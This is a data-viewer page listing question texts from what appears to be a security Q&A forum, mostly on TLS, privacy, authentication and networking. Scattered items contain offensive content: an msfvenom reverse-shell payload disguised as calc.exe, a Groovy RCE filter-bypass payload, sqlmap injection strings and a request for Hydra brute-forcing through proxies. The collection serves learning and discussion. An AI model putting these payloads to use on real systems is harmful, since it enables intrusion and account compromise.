instruction stringlengths 24 29.9k |
|---|
As the title suggests. If I set the net.bindIp setting in mongod.conf to 0.0.0.0 on port 27017 this should open it up to all incoming connections. However, if in my ec2 instance I whitelist only my local IP on 27017, will this block all other incoming connections?
I should also note I have a mongodb user with a passwor... |
I have some difficulties wrapping my head around the following concept:
When HTTPS inspection (outbound) is enabled on a NextGen Firewall (NGFW) e.g. CheckPoint, a certificate has to be installed on the NGFW. These certificates (or at least the root/intermediate) need to pushed or installed on the clients to be able to... |
I use Fail2ban on a busy Debian-based database server to secure ssh against brute force attacks, but for performance reasons, I don't want to log every connection from the application server (it would be a big resource hog to read every query to log and parse that by Fail2ban - which is written in Python and is quite s... |
I'm in the planning/design stages of a project which will incorporate an internal server that communicates with internal clients. A quick summary of how this server will behave is as follows: end-users will make calls/commands to the server and depending on the information received by the server, it will initiate a pse... |
I would like to encrypt some of my application data stored on a MySQL DB using AES-128. I wonder thus what is the best way to store my key on the webserver.
Should I encrypt the key itself or store it raw? Should I store in a file, a BLOB or as a record on some table? Should the key be stored on a server other than the... |
According to my understanding there is upgrade to the WebSocket protocol during the WebSocket handshake.
We use HTTPS connections (we do not use HTTP).
Should we configure the WebSocket protocol in a firewall between a browser and a server?
Or enough to allow only HTTPS between a browser and a server?
There are some li... |
I am learning about auth and session management, and using express-session in Node js. I am not able to find the need for this package. I read a about it online, but didn't get a satisfying answer. Considering it is used widely, I am missing something.
I know when the user enters email/username and password, the server... |
My roommate asked me to share my internet connection with him for his company laptop. I have the option to give him wireless (WiFi credentials) and wired access (ethernet).
If I do decide to share,
Should I go for wired or wireless? (Speed and coverage area are not an issue yet.)
What are the things his company IT cou... |
I am a novice about digital things (imagine the antonym for "tech savvy").
Can my ISP know my yahoo email address? I have signed in on yahoo more than a million times. Yahoo is https.
Can my ISP know my Yahoo password?
Can my ISP know my Amazon.in (India) account email and password? There are Indian alternatives to ... |
I am wondering what are the possible options for the following:
Let's say you have a software-agent you want to deploy on systems running both on Windows and Linux, e.g. an agent written in C++.
Let's say this agent uses certificates issued by a PKI to do authentication towards a centralised system, be it locally or in... |
Since only a select amount of amount of microcontrollers in the USBs can be reprogrammed, isn't it just possible to block that certain kinds of microcontroller containing devices?
|
Background
Often developers and clients need to exchange passwords to be able to access some services. Of course the best option would be to never use someone else's credentials to log in, and instead create a different account for every user. And of course there's always the option of using a remote-desktop applicatio... |
Is there an effect of a certificate, or the request for, having the wrong country code? How about the other metadata? Effects can be legal, technological, anything.
I could almost imagine a web browser checking the certificate country and province against the server's geolocated ip, but I could see that having false po... |
Assuming no one is able to inspect or MITM in the network. Can I see it as a way to ensure the source IP in packet's header is the real source of the packet, so a kind of authentication ?
|
I wrote a web application that is using AD authentication (Windows) and has its own authorization module (RBAC-like). Back-end is Microsoft SQL Server.
A DBA on my team is not happy with us using a service account to talk to the database, he would rather have the actual user impersonated using EXECUTE AS at the databas... |
Firstly, I assume it's possible to passively read the encrypted data from a ePassport NFC chip?
All of the NFC scanning apps fail to load anything without the BAC. We are not interested in the encrypted data and don't require the BAC.
One app allows you to enter/or scan the BAC (DOB, Exp Date, and Name) to gain access ... |
Basically all in the title.
Imagine a simple CSP like
Content-Security-Policy: script-src 'self'
What is the behaviour of directives that would normally fall back to default-src which are not specified such as img-src or frame-src? Will they default to open (allow everything) or default to closed (allow nothing)?
Unle... |
I like to track the websites my daughter goes to in order to have some control. So I installed bettercap and setup a script to start it to sniff the HTML URLs being accessed (well, the reverse URL from the IP really).
sudo bettercap --eval 'set events.stream.time.format 2006-01-02 15:04:05;
set a... |
I run a Linux virtual machine on my Windows 10 host.
What information (e.g. https traffic) can be monitored from the host?
Is it safe to browse on a virtual machine that uses the host device's network adapter (regarding privacy)?
|
Can Governments order an ISP to decrypt data about any user's personal information. If there is some information, for example, that some terror suspect has been active on an HTTPS website on the internet, is it technically possible to decrypt his activity on the website?
HTTPS is secure because of encryption. Can the g... |
SCENARIO:
When a user browses to the login page the web application sets SESSIONID=X; Httponly; before the authentication.
After the authentication NO new cookies are set. The only cookie used to identify the session is SESSIONID=X.
This should mean that the webapp is vulnerable to the session fixation attack.
I want t... |
I'm trying to exploit groovy engine for RCE. However, the developer fixed by restricting the method calls with name 'exec', 'execute', 'run', 'start'. Is there any bypass or alternative to these methods?
Initial Payload
def a= 'wget https://example.com/'.execute()\n\na.consumeProcessOutput(sout, serr)\n\na.waitForOrKil... |
There is a recent malware called MalLocker that hijacks and occupies the full screen size by using SYSTEM_ALERT_WINDOW permission. It poses as ransomware by looking as such but doesn't encrypt files.
"The notification was intended to be used for system alerts
or errors, but Android threats misused it to force the
atta... |
I'd like to practice CTFs and cyber attacks on vulnerable VMs downloaded from seemingly reputable sources.
Which are the basic guidelines for securing the environment and avoid that malware (if any) would infect the host (my laptop)? Is setting up a Custom Specific Virtual Network (for just the attacking VM and the vul... |
My question is on Cyber Threat Intelligence (CTI). I want to know the difference between Attack Patterns (as in MITRE CAPEC) and Tactics, Techniques and Procedures (as in MITRE ATT&CK). They both seem to describe the behaviour and modus operandi of the adversary, so what is the difference really?
What is the difference... |
While scanning a host with nmap I have discovered an unusual service. The service moves to another port everytime I perform an nmap-scan or try to curl it. I have not yet found any info about similar cases, so I am currently not sure how to move forward. Are there any ways I can try to connect to the service, without t... |
Baseband Processors have very weak overall security(closed-source firmware, no audits etc.)
It also gives the telecom operator very high privileges on a mobile device.
So, now I use 2 phones. First one being a 'relay' which has a SIM card, and connects to the internet normally. I turn this phone into a Wi-Fi hotspot an... |
I am considering the security risks to have a standard user added to the Administrators group on an enterprise Windows 10 machine that is dedicated to that user. This is related to security only, so breaking the OS of a wrong manipulation, installing unlicensed programs or similar administrative tasks is out of scope o... |
As part of our secure SDLC, we are delivering security as security requirements directly into the backlog of an application team. The security requirements will directly correlate to the functional features being delivered in the iteration. I am predominantly talking about application-based controls (code level) here.
... |
When I order groceries, I get an e-mail receipt. I save this HTML file and save it.
Then I load it in Pale Moon some other time, so that its URL is file:///C:/blablablabla/receipt.html.
When I do this, it loads a bunch of images (logos and whatnot), hosted on Cloud-something. The point is, they are not images on my har... |
This is on a somewhat layman's level. I'm not a security guru.
Looking at this in very, very broad and general terms:
Election fraud is definitely a serious issue that needs to guarded against pretty heavily, ideally by many third-party officials and monitors. If you have random people working at the polling stations... |
I have a desktop computer in my home network with SSH server running on it. Using another computer in my private and local network (class C IP addresses: e.g., 192.168.0.2, etc) I sometimes use SSH to enter into the desktop PC with command ssh <user_name>@192.168.0.2 and work remotely.
I am wondering if someone from th... |
Let's say I have VirtualBox or Vmware Workstation on a Windows 10 Pro host, hosting Windows or a Linux distribution such as Ubuntu or CentoS). If I have an antivirus or Internet Security software on the Windows host, could it protect Windows or Linux VM's?
Can any consumer, SOHO, or small business version of Norton, Av... |
Recently my friend called their bank (via a normal phone call) to perform an operation with her account and she had to type her password during the call. Everything worked fine, the operation was done successfully.
Note: the password she used was the same for accessing the bank app in her smartphone.
What are the risks... |
I'm using msfvenom to create a payload with a calc.exe file as the template for a windows 7 machine using the HTTPS port. I create the file by using the following:
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST:[attacker_ip] LPORT:443 -f exe -x /root/Desktop/calc.exe -o /root/Desktop/poccal... |
Let's say I have the following PHP code:
<?php
echo file_get_contents($_GET['path'] . ".txt");
Obviously, it's insecure as path traversal is possible when passing e.g. ../../file as a GET parameter.
But is there any way for an attacker to retrieve contents of a file that doesn't end with .txt as Null byte related ... |
Is there a reliable, public registry (preferably in the form of an API) that records known security vulnerabilities in open source software?
Why would anyone want this?
I'm trying to emulate github's dependabot on a local server. It simply scans all repositories and checks dependencies for updates, and alerts the maint... |
Is there a way to run Hydra through a series of proxies so a website can't lock you out? Having a hard time finding a way to do this. Most websites will block you out if you take to many attempts at logging in and if I am trying to brute force a password, I am going to have to constantly have to look like I am coming f... |
Within my API backend i have a unique KeySalt for every API Key
public string Key { get; set; }
public byte[] KeySalt { get; set; }
public string KeyHash { get; set; }
When the user creates a new API key, I present the generated Key only once, (and store only the last 4 characters in the Key field) so the user can u... |
We have an application that allows users to login using fingerprint. The server validating the sent fingerprint. Now, anyone can watch the traffic and resend them. What the best way to prevent this from happening? Should we add captcha when using fingerprint as validating the fingerprint?
Update: We have a system where... |
This answer states that encrypting a private key using openssl rsa -aes256 isn't secure, because the md5 hash of the password is used as encryption key.
But what if I do openssl pkcs12 -export -in client.crt -inkey client.key -name client -out client.p12 -password pass:12345 instead? (Using a better password of course.... |
I apologize for the weird wording of the question title, I was hitting the character count.
I am taking a network security course in college and the textbook we use, Network Security Essentials: Applications and Standards 6th Edition by William Stallings, dives into firewalls in chapter 12. The book defines 6 firewall ... |
I have a python bot that runs in Windows 10 and accesses Keepass with a password.
I'm wondering what would be the correct way to store and access this Keepass password.
Currently, the Keepass password is encrypted and decrypted with a key.
However the key is available to the python bot and therefore to anyone.
Am I mis... |
Recently, I was forced to log in to my Gmail account with a browser to keep using it.
Then, Gmail noted that the "alternate e-mail address", my 1999 Hotmail one, which I had long ago associated with my Gmail account (in 2004), has been "detected as not secure". I forget the exact phrasing. Something about it being dete... |
How would a CA submit a certificate to Certificate Transparency logs? Preferably Google's Pilot or Rocketeer CT.
Would one submit via an API, SDK, library? If submitting should it be a render of a certificate (without log extensions) or the final certificate?
|
I know how to create a self-signed certificate in a one command:
openssl req -x509 -newkey rsa:4096 \
-keyout my.key -passout pass:123456 -out my.crt \
-days 365 \
-subj /CN=localhost/O=home/C=US/emailAddress=me@mail.internal \
-addext "subjectAltName = DNS:localhost,DNS:web.internal,email:me@mail.internal" \
-addext k... |
Whenever I read something like "ISPs store your data" or "ISPs delete your data after 6 months" or anything like that, I imagine data to be the following things:
(1) At what time I accessed the Internet, got what IP address (in case of dynamic IPs) and accessed what website with it.
(2) How long I remained on that webs... |
Suppose that in some scenario using SSL, a hacker has succeeded in obtaining the MAC address, but not the encryption.
Can this be detected?
Also, suppose he changes the MAC address: what should he also change in the IP and TCP layers?
|
Suppose that someone browses non-Youtube videos (like on Vimeo) in Google Chrome's Incognito mode.
Does Google collect and store any data about this activity ("watched videos on Vimeo" activity)?
In general, does Google store ANYTHING that is done in Incognito mode?
|
I recently found out that a VPN service does not hash their customer passwords and I need professional insight on how to deal with this.
Here's how I found out:
Bought a subscription on the wrong email address.
Changed the password for that account because the one they provided was weak.
Asked support to change the ac... |
I'm solving CTF challenge, and have to escalate the privilege from user1 to user2, $HOME is read-only, so i can't change $HOME/.bashrc.
sudo -l shows (user2) NOPASSOWRD: /usr/rbash -- i can't write any commands before or after --, it doesn't escalate.
I must get user2 privilege to read a file owned by it, any idea ... |
I have no cyber security knowledge whatsoever, and am trying to safely store passwords in a database. I understood I need to use salt, to avoid rainbow table attacks and to make sure two users with the same password will have different password hashes.
However, does the complexity of the salt matter? I was planning on ... |
It is known that ISP has to log various network data for various purposes, such as law enforcement needs.
However, what are some examples of software tools used by ISPs to browse this huge amount of network logs?
In addition, how time-consuming is for ISP, for example, to look for a user behind a given IP address if th... |
I'm running aircrack-ng version 1.6 on Live Kali. I noticed that "recently" a -N option has been added for saving a session, which can be later resumed with the option -R.
However this seems to have the following issues:
the created session file is 0 bytes long
almost always, I'm unable to stop (quit) aircrack e.g. tr... |
Having the following pseudocode executed by a superuser, is it safe to assume that it is secure on Linux?
if fork() == 0:
# drop privileges to an unprivileged user, let's say "nobody"
# perform various tasks, start other processes as "nobody"
# communicate with parent process through unsafe means, e.g. Python ... |
I have purchased AVG's premium service to use on a Windows 10 operating system, but it almost seems like since I have gotten it, (had it for about a month now) it keeps alerting me that it has blocked someone from remote accessing my computer.
These alerts seem almost random in time but looking at the logs shows multip... |
Ok, I fully admit this might be in the realm of paranoia, but hey, isn't that sort of the name of this game? :)
I'm staying in a hotel room and needed to buy a small, cheap laser printer for some printouts I need to do. After shopping far and wide, I decided the Pantum P2502W fit the bill perfectly- tiny footprint and ... |
I want to implement role based authorisation in my TLS connections. I.e. when my client authenticates with the server I want them to have certain privileges based on their role.
Are there any provisions in the TLS protocol which facilitate this?
Thanks!
|
Consider following C code snippet:
void barfoo (int authstatus) {
char packet[1024];
fgets (packet, 1023, stdin);
if (authstatus != 0)
system (packet);
else
syslog ("Not authorised to process packet");
return;
}
Attacker can only call this function with auth_status set to 0. Goal of... |
Is there a guaranteed way to:
Know there is a Remote Access Trojan in my PC?
Remove it completely and successfully from my PC?
Note: Assume that the hacker doesn't leave any hint of their activity (like moving the cursor).
If there is no way to detect or remove RAT with 100% guarantee, what other ways could guaran... |
I have a PKCS #12 file and want to export certificates and private key from the PKCS #12 file with openssl.
openssl pkcs12 -in test.p12 -nocerts -out key.pem
openssl pkcs12 -in test.p12 -out certs.pem -nokeys -nodes
I want to uncrypt the key file
openssl rsa -in key.pem -out uncrypt_key.pem
But if I want to validate ... |
Is there a way to add/enable ECDHE-ECDSA-CHACHA20-POLY1305 and ECDHE-RSA-CHACHA20-POLY1305 ciphersuites on Windows Server 2019 (Build 1809 or later) for HTTPS configuration of IIS webserver?
According to the TLS Cipher Suites in Windows 10 v1809 (unfortunately, this page does not explicitly mentions Windows Server 2019... |
I have recently seen a web application that, while using Authorization header, accepted multiple Bearer keywords followed by a valid JWT token. For example, all of the following headers would result in correct authentication:
Authorization: Bearer jwttokenhere...
Authorization: Bearer Bearer jwttokenhere...
Authorizat... |
I have enabled multi-factor authentication for my Gmail. When I need to log in to my mail, I should enter an OTP which is sent to my phone number.
I got a call from this number, even though I did not sign in to my mail, and it said "Your verification code is ******". Does this mean that my account is at risk? I have ch... |
I've downloaded a book but by default its considered malicious by me.
I thought of converting that PDF to JPG here:
https://smallpdf.com/pl/pdf-do-jpg
Then backwards:
https://smallpdf.com/pl/jpg-to-pdf
Is converting PDF to JPG then backwards via web services considered a method for obtaining a safe PDF?
|
I was doing an exam and answered "true" to this question but the augrader said it was false
TLS derives a session key from the agreed master secret. That key is
then used during the TLS session for encryption and authentication of
the session data
Is this an error or is it really false ?
|
I am creating a file that uses Socket for exchanging data. When I use Python I have a firewall pop up where I am asked to accept the use of the application, but when my C++ program tries to do the same, the firewall doesn't warn me. My question is what differs in both cases? Is it the language?
I run it on Windows, and... |
Type Ctrl + Shift + N. Then type DIVIDED WE FALL and then click enter. Click a search result that takes you to YouTube. Go back to the search results. Retype "DIVIDED WE FALL by Valarie Kaur". Click enter. Click on the result that takes you to Vimeo. You see the full documentary there and watch it.
If all this were don... |
Contents of government gazette, Linux distributions, Open Data, etc. are public, there are no constraints for "increase user privacy". On the contrary, we want to guarantee transparency... But all tutorials and explanations about DNSSEC are also about internet banking and user privacy: is possible to separate concerns... |
First, some excerpts from the CVSS official docs.
According to CVSS 3.1 Specification:
While the Confidentiality and Integrity impact metrics apply to the
loss of confidentiality or integrity of data (e.g., information,
files) used by the impacted component, this metric refers to the loss
of availability of the impact... |
getapassphrase.com is a website that generates passphrases. The user sets a complexity in bits, and the site spits out results like:
liberal panda and ill asp decline young suit in Kansas
or
rowdy whale and tired DJ build brown harp in Berlin
(For 64 bits, they all pretty much seem to follow the pattern of [adjective] ... |
khgpd://zpn.xddspbx.nrf/j/9djwth14tmct9tf/uzdwvrrnonv.tue?gz=0
This is an encrypted text and is most prob a url....pls decode it or tell me which cipher is it, this is not for any security breaches and it is a hint in a cryptic hunt
|
Summary:
Certificates calling to OCSP Responder (OCSPr) have their "Cert Status" change from "good" to "unknown" with no known to changes to environment. Completely lost on this one.
More Detail:
I have been building a simple suite for Certificate creation and OCSP handling for local and personal certificate testing an... |
I want to prevent my daughter from accessing YouTube while she's attending school. So I was thinking to add protections in iptables. Unfortunately, when she goes to YouTube, the DNS resolves to IP addresses which reverse lookup to 1e100.net (which is owned by Google, no worries there,) so... a reverse lookup block is n... |
Instead of collecting various logs into the SIEM, can a full packet capture solution be better in terms of having to manage so many log sources?
|
The BBC reports that the image Boris Johson posted on Twitter to congratulate Joe Biden contains traces of the text "Trump" in the background. The BBC article links to a Guido Fawkes' article, and when I download the tweet's JPEG, convert to PNG with macOS preview then subtract a constant background, there it is!
When ... |
My company is using on premise DMZ proxy servers to limit internet access to employees working from home. When they use company laptop, they are automatically configured to go through the proxy server for all traffic. The proxy will then block access to malicious and other unwanted site.
This solution works but is very... |
How do I make sure everything of mine is keep private? Everything from what I search to passwords to Facebook to banking? I'm pretty sure I've been hacked in the past considering I can no longer get into my old accounts
|
I understand that many open-source projects request vulnerabilities not to be disclosed on their public bug tracker but rather by privately contacting the project's security team, to prevent disclosing the bug before a fix is available. That makes perfect sense.
However, since the code repository of many open-source pr... |
As an example, I have installed Anti-CSRF Scanning rule in ZAP proxy and scanned a POST request which does not verify the CSRF token value from the back end. Ideally, it is a CSRF vulnerability, but ZAP proxy scanner did not detect that. I am wondering whether I have done the scan correctly, but could not find any plac... |
I am a student studying information security. Recently I read this article link and made full exploit code. calc.exe is executed as expected. But after running shellcode, IE just crashed. (because no more code provided after shellcode...). I tried to avoid crash but could not find proper solution. What I tried is as fo... |
Please note, I'm looking more for established documented best-practice rather than personal opinion in this question. I'm also not interested in Fail2Ban specifically but the class of technologies that Fail2Ban is a member of.
Fail2Ban et al track misbehavior by IP addresses, such as repeatedly attempting to log-in wit... |
Back in the day, mostly, such injections were taking place over the
server log files. Such files are the Apache error log, the Access log
and more. Techniques like these have been used for years and,
hopefully, they won’t work on updated systems - even if they are LFI
vulnerable.
Source
They won't work on updated sys... |
So it's unclear how much more security needs to happen at the ACS point.
I can see that the IDP signs a signature that involves a certificate and private key.
The SP can verify the signature with the copy of the certificate it holds. Is that all that's needed to prevent forgery of a SAMLResponse hitting the ACS? Or wil... |
I notice on various documents involving the Trickbot malware, they all state that trickbot determines the infected host's external IP address by communicating with the following hosts:
hxxp://myexternalip.com/raw
hxxp://api.ipify.org
hxxp://icanhazip.com
hxxp://bot.whatismyipaddress.com
hxxp://ip.anysrc.net/plain/clien... |
I am fairly new to sql injections and tried to solve a little hackit to understand everything better. I wasn't able to solve one of the levels so I ran sqlmap to see what it would do. The payloads that I got looked a bit like this
http://some-hackit.com/sqli/level4.php?id=0'+or+ascii(substring((select+smth+from+somethi... |
What would be some security implications of a fixed pathname (although probably in a system directory when it would be deployed as a system service) rather than a relative (out of current directory)? If the answer is "it depends", how so?
|
First and foremost, I'm not asking for a software recommendation. I need a direction in which I should start moving.
I often need to search the internet and open many tabs in my browser. Sometimes I just don't have time to think if some particular site might be malicious.
I never save any pages, I merely copy some text... |
An application does encrypt the data using a secrete key before the data is being written to the database to prevent the disclosure attack.
However how do we verify the integrity of such data when application retrieve data from database and decrypt it? what if a privileged user (DB admin) update the encrypted data in t... |
Everyone recommends to use the pre-defined ffdhe groups from https://www.rfc-editor.org/rfc/rfc7919
There are multiple sources (for example mozilla) where I can download the DH PARAMETERS file but how can I generate it with the information provided in https://www.rfc-editor.org/rfc/rfc7919#appendix-A.3?
|
I want to build a REST API where applications can authenticate using an OAuth2 Bearer Token, so they get access only to resources related to one user or they can access by itself accessing resources for their own application or general resources. Therefore I ask myself how to authenticate these applications when they a... |
I have just compromised a computer(legal in my local environment) and want to run nmap from that host to see further inside the network. I know I can use metasploit modules like "auxillary/scanner/portscan/tcp/", but it seems like it isnt as good as nmap. I tested this by running nmap on a an ip from my computer and th... |
I have an application that communicates with the server through a TCP TLS 1.2 connection. The app probably uses certificate pinning. I want to intercept this traffic.
Is there any way to decrypt the traffic except extracting master secret or RSA private key?
Will MITM approach (like sslsplit) work here?
|
Think of the worst possibility: Someone has your laptop and you are being coerced into giving them your password.
Can my Linux (I'm thinking of Arch) system be configured in a way that when a specific "fake" password is entered, a script is triggered so that, for example, some files are deleted?
Or maybe, given this wr... |
P3P has been removed from Internet Explorer and Edge in Windows 10. Is there a third-party browser extension that, as a cookie filter, reads compact privacy policies and allows or blocks cookies based on the privacy policies? Just like Internet Explorer used to? An add-on for Internet Explorer or extension for Edge? Th... |
I know of a user within my network who initiated a VPN connection within my network. What are ways I'll be able to find out the identity of user, searching port numbers? specific protocol established?
I am Using IBM qradar for monitoring a medium sized organisation.
|
Does normal network traffic sent out by software or anything else use port scanning for legitimate reasons?
I'm using psad on my linux server and am unsure if setting the auto-ban IP feature on danger level 1, which equals to 5 sent packets, would accidentaly ban justified traffic and therefor users.
|
How would one go about getting in contact with a popular CT logs operator's, let's say Google Pilot, and how would one get a CA root included in their log? Are there open CT logs that allow untrusted roots or don't have a root system/program?
|
I'm trying to crack a MySQL323 hash and I'm unable to get it done.
I was able to confirm tye hash type:
I came across https://www.tobtu.com/mysql323.php.
I can run it as "mysql323 32.exe" [number of threads] [hash] [keyspace-file] but there is no reference what the keyspace-file should be.
Trying to crack the hash in ... |
I have recently participated in a CTF competition and failed in the following stage where the solution was never revealed.
After a really hard job I got access to a text file that contains a really strange set of letters which should guide me through the next stage.
Some of the text is:
OOOMoOMoOMoOMoOMoOMoOMoOMoOMMMm... |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.